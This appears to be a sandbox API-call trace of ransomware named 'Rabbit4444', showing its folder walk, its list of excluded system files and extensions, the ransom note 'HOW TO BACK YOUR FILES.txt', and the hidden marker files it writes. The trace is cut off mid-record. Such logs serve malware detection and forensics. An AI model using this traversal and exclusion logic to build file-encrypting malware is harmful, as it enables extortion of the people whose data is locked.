[0070.909] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf39685bc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf39685bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf39685bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.909] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x416d25ac, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4b8a7f2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.909] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.910] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.910] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.910] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.910] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.910] lstrlenW (lpString="Rabbit4444") returned 10 [0070.910] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.910] lstrlenW (lpString=".dll") returned 4 [0070.910] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.910] lstrlenW (lpString=".lnk") returned 4 [0070.910] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.910] lstrlenW (lpString=".ini") returned 4 [0070.910] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.910] lstrlenW (lpString=".sys") returned 4 [0070.910] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.910] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x416d25ac, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4b8a7f2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.910] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.910] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.910] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.910] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.911] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.911] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.911] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.911] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.911] lstrlenW (lpString="Rabbit4444") returned 10 [0070.911] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.911] lstrlenW (lpString=".dll") returned 4 [0070.911] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.911] lstrlenW (lpString=".lnk") returned 4 [0070.911] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.911] lstrlenW (lpString=".ini") returned 4 [0070.911] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.911] lstrlenW (lpString=".sys") returned 4 [0070.911] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.911] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x416d25ac, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4b8a7f2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.911] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0070.911] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.911] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280811\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280811\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.912] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.912] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.912] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.913] CloseHandle (hObject=0x260) returned 1 [0070.913] CloseHandle (hObject=0x228) returned 1 [0070.913] GetCurrentThreadId () returned 0xd98 [0070.913] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0070.913] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810" [0070.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1049c0 | out: hHeap=0xe0000) returned 1 [0070.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0070.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810" [0070.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\" [0070.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\.BFC0E91B00AE8A0620D3" [0070.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280810\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.917] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.920] FlushFileBuffers (hFile=0x228) returned 1 [0070.920] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.921] CloseHandle (hObject=0x228) returned 1 [0070.921] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810") returned 142 [0070.921] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41554e17, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x821ae63c, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf39685bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0070.921] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.921] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.921] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.921] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.921] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41554e17, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x821ae63c, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf39685bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.921] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.921] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.921] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.921] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.921] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.921] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf39685bc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf39685bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf398ddc4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.921] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.921] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.921] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4157b08c, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x4157b08c, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4af1f4d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.922] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.922] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.922] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.922] lstrlenW (lpString="Rabbit4444") returned 10 [0070.922] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.922] lstrlenW (lpString=".dll") returned 4 [0070.922] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.922] lstrlenW (lpString=".lnk") returned 4 [0070.922] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.922] lstrlenW (lpString=".ini") returned 4 [0070.922] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.922] lstrlenW (lpString=".sys") returned 4 [0070.922] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.922] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41554e17, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x41554e17, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4aa5afd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.922] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.922] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.922] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.923] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.923] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.923] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.923] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.923] lstrlenW (lpString="Rabbit4444") returned 10 [0070.923] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.923] lstrlenW (lpString=".dll") returned 4 [0070.923] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.923] lstrlenW (lpString=".lnk") returned 4 [0070.923] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.923] lstrlenW (lpString=".ini") returned 4 [0070.923] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.923] lstrlenW (lpString=".sys") returned 4 [0070.923] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.923] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41554e17, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x41554e17, ftLastAccessTime.dwHighDateTime=0x1d32747, ftLastWriteTime.dwLowDateTime=0xa4aa5afd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.923] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0070.923] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280810\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280810\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.924] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.924] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.924] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.925] CloseHandle (hObject=0x260) returned 1 [0070.925] CloseHandle (hObject=0x228) returned 1 [0070.925] GetCurrentThreadId () returned 0xd98 [0070.925] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0070.925] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986" [0070.925] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104898 | out: hHeap=0xe0000) returned 1 [0070.925] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0070.925] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986" [0070.925] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\" [0070.925] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\.BFC0E91B00AE8A0620D3" [0070.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.929] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.931] FlushFileBuffers (hFile=0x228) returned 1 [0070.932] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.932] CloseHandle (hObject=0x228) returned 1 [0070.932] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986") returned 142 [0070.932] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.932] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa6b72c16, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf398ddc4, 